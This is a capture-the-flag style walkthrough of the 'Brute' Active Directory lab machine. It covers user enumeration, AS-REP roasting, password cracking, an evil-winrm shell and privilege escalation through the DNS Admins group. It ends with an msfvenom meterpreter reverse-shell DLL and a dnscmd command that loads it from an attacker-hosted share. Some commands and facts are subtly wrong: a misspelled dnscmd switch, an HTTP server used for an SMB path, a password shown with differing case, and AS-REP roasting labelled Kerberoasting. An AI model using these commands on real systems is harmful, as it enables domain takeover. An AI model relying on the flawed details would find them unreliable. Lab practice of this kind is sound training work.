Premise

In this walkthrough, we went over an Active Directory Windows where we have been able to gain domain controller access by exploiting the DNS Admin group to which we were able to add a non-privileged user.

The scenario shows how Microsoft Active Directory features are vulnerable to several attacks due to its various required settings to be configured.

Machine Name: Brute

Operating System: Windows Server with Active Directory

Difficulty: Medium

Created by : wtfitsaduck

Skills Learned

  • ASREProasting
  • Kerberute
  • Privilege Escalation

Finding My Way In: Enumeration

I started by running an Nmap scan to see what ports were open and to get some basic information about the domain. This is always my first step, as it gives me a map of the network. I focused on Kerberos (port 88) and LDAP (port 389) to try and find some valid usernames.

My first attempt with an LDAP script didn’t give me any users, so I switched to a Kerberos enumeration script. After a little bit of trial and error with the command, I was able to find several users, including “patrick,” “malcolm,” “administrator,” and “test.” I saved these usernames for later.

Getting a Foothold: Kerberoasting and Cracking

Next, I used a tool called GetNPUsers.py to see if any of these users had a special setting called “Kerberos pre-authentication” disabled. This is a weakness that can be exploited to get a user’s password hash. Luckily for me, the “test” user had this setting disabled, and I was able to get their hash.

With the hash in hand, I used John the Ripper and a common password list to crack it. It didn’t take long to find the password: “unique1”.

Getting a Shell: WinRM and DNS Admins

Now that I had a username and password, I used a tool called evil-winrm to get a shell on the machine as the “test” user. This was my initial access, but I wanted to get full control of the system.

I checked what groups the “test” user was in and discovered they were a member of the “DNS Admins” group. This was a huge win because this group has special privileges that can be used to run code with system-level permissions.

The Final Step: Malicious DLL and System Shell

To take advantage of this, I used msfvenom to create a malicious DLL file that would give me a reverse shell. I then set up a simple web server on my own machine to host this file.

From my shell on the “Brute” machine, I used the dnscmd command to tell the DNS server to load my malicious DLL. Then, I restarted the DNS service. As soon as the service started, it loaded my DLL, and I got a reverse shell with full NT AUTHORITY\SYSTEM privileges!

Technical Commands I Used

Here are some of the key commands I used in the terminal during this penetration test:

  • Nmap Scans:
    • sudo nmap -p 389 --script ldap-search --script-args ldap-search.rootdn="DC=brute,DC=csl" 172.31.3.3
    • sudo nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=brute.csl,userdb=/usr/share/wordlists/seclists/Usernames/Names/names.txt 172.31.3.3
  • Kerbrute:
    • ./kerbrute userenum --domain brute.csl -d 172.31.3.3 /usr/share/wordlists/seclists/Usernames/Names/names.txt
  • Impacket’s getNPUsers.py:
    • sudo python3 /usr/share/doc/python3-impacket/examples/getNPUsers.py brute.csl/ -dc-ip 172.31.3.3 -usersfile users.txt
  • John the Ripper:
    • john --wordlist=/usr/share/wordlists/rockyou.txt hashes
  • Evil-WinRM:
    • evil-winrm -i 172.31.3.3 -u test -p Unique1
  • Windows Commands:
    • net group "Domain Admins" /domain
    • dnscmd /config /serverlevelpluginll \\10.0.0.7\share\dnsdll.dll
    • net stop dns
    • net start dns
  • Msfvenom:
    • sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.7 LPORT=4545 -f dll -o dnsdll.dll
  • Python HTTP Server:
    • sudo python3 -m http.server 80

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles